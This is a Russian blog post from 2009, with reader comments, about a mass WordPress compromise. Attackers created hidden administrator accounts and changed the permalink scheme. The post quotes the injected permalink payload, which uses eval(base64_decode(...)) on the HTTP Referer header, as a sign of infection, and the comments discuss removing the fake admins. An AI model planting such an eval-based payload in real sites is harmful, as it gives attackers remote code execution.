Взлом WordPress. HTTP_REFERER в url.
Намедни случилась большая паника среди wordpress-сообщества: злобные хакеры поломали кучу сайтов на Wordpress. Вскрытие показало, что в движке чуть ли не с рождения имеется большая дыра. Удивительно, что раньше никто на это не обратил внимания. Видимо, из-за отсутствия явно выраженных признаков взлома или не столь массового характера. Проявился взлом в виде “аппендиксов” у урлов примерно такого вида: /%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
Уязвимость заключается в том, что низкоуровневый юзер может получить доступ к некоторым страницам админки, на которых ему делать нечего. (Чтобы пионеры не игрались, я не буду описывать сам метод.). Хакер регистрируется, делает себя админом и хитрым образом прячется, чтобы настоящий админ его не увидел в списке пользователей. В принципе, для того, чтобы изменить схему ЧПУ, не нужно даже повышать уровень. Так что получается, что имеют место две проблемы: доступ куда не надо и левые админы.
Comment DI HALT — 6 сентября 2009 в 13:45
Т.е. число администраторов указанное в скобочках увеличивается на одного фейкового, но если зайти в список админов то их там будет меньше?
Comment Белотицкий — 6 сентября 2009 в 13:51
Да. Но возможны и варианты. У lecactus`а вообще чёрт те что нарисовалось.
Comment Александр — 7 сентября 2009 в 09:01
а как удалить пользователя левого (у меня аж два зарегено) - если не видны они? показывает - админов 3 , но выводится только 1. который я.
Comment Белотицкий — 7 сентября 2009 в 09:06
Я же написал как снять маскировку. После этого они должны замечательно удаляться штатным образом.
Comment Пинк — 8 сентября 2009 в 01:40
Что-то в последнее время много багов в ВП накопали и в паблик выложили. С учётом того, что далеко не все обновляются своевременно, всё как-то не особенно радужно.
Comment Arben — 8 сентября 2009 в 12:44
У меня 31 августа вдруг пришло письмо что мол новый пользователь зарегистрировался на вашем блоге. ну я тут же его и удалил. При этом отключил регистрацию пользователей. Лишних админов не заметил. Ссылки вроде работают нормально. Какие еще могут быть подводные камни?
Comment Белотицкий — 8 сентября 2009 в 12:56
Боюсь, даже Создатели не смогут дать исчерпывающий ответ. Пока камни не превратятся в г… и не всплывут - не узнаешь.
Comment enter — 8 сентября 2009 в 16:34
А я удалил, через phpmyadmin, удалил просто подозрительного пользователя из таблицы wp-users, у меня их не много, так что его вычислить была не проблема. Так пройдет?
Comment Белотицкий — 8 сентября 2009 в 16:40
Ага. Только еще надо подчистить табличку wp_usermeta.
Comment Chief — 10 сентября 2009 в 00:40
Спасибо, меня взломали именно таким макаром, сейчас почти все восстановил, но так все паскудно сделано. Не все же гении кодинга, кто-то просто пишет в блог…
Comment Белотицкий — 10 сентября 2009 в 09:53
На то они и хакеры, чтоб ломать. Вот несколько заголовков с Секлаба:
Comment andrey — 24 сентября 2009 в 21:23
Юрий, правильно ли я понимаю, что официальной рекомендации от разработчиков вордпресса о том как закрыть дыру, кроме как обновиться до 2.8.4, до сих пор так и не было?
Comment Белотицкий — 24 сентября 2009 в 21:27
Если быть точным, то не “до сих пор“, а “на момент написания поста“. Впрочем, одно другому не противоречит. Честно скажу: не смотрел.
Comment Kuznets — 13 января 2010 в 09:07
Здравствуйте. Сегодня на одном старом блоге обнаружил второго админа, но не невидимого, а вполне видимого с замечательным именем readmin. который был конечно удален… конечно зделано было не ради интереса, поставили скрипт, достаточно хитрый. так заходишь, его не видно, только когда по поиску с гугла например, появлялась реклама на (не буду называть что, а то акишмет не пропустит). Еще легко отделался. Пора менять пермишн на файлы теплейтов и плагинов. уж лучше на локальной машине, а потом по фтп.
версия вордпреса на тот момент 2.82
Извиняюсь что много написал - под впечатлением:)
Comment Fedyanya — 26 января 2010 в 02:22
От блин эти хакеры, задолбали уже меня полностью
Comment Белотицкий — 26 января 2010 в 11:22
Ага, задолбали. Как и спамеры, норовящие втюхать ссылку на свой говносайт любым способом.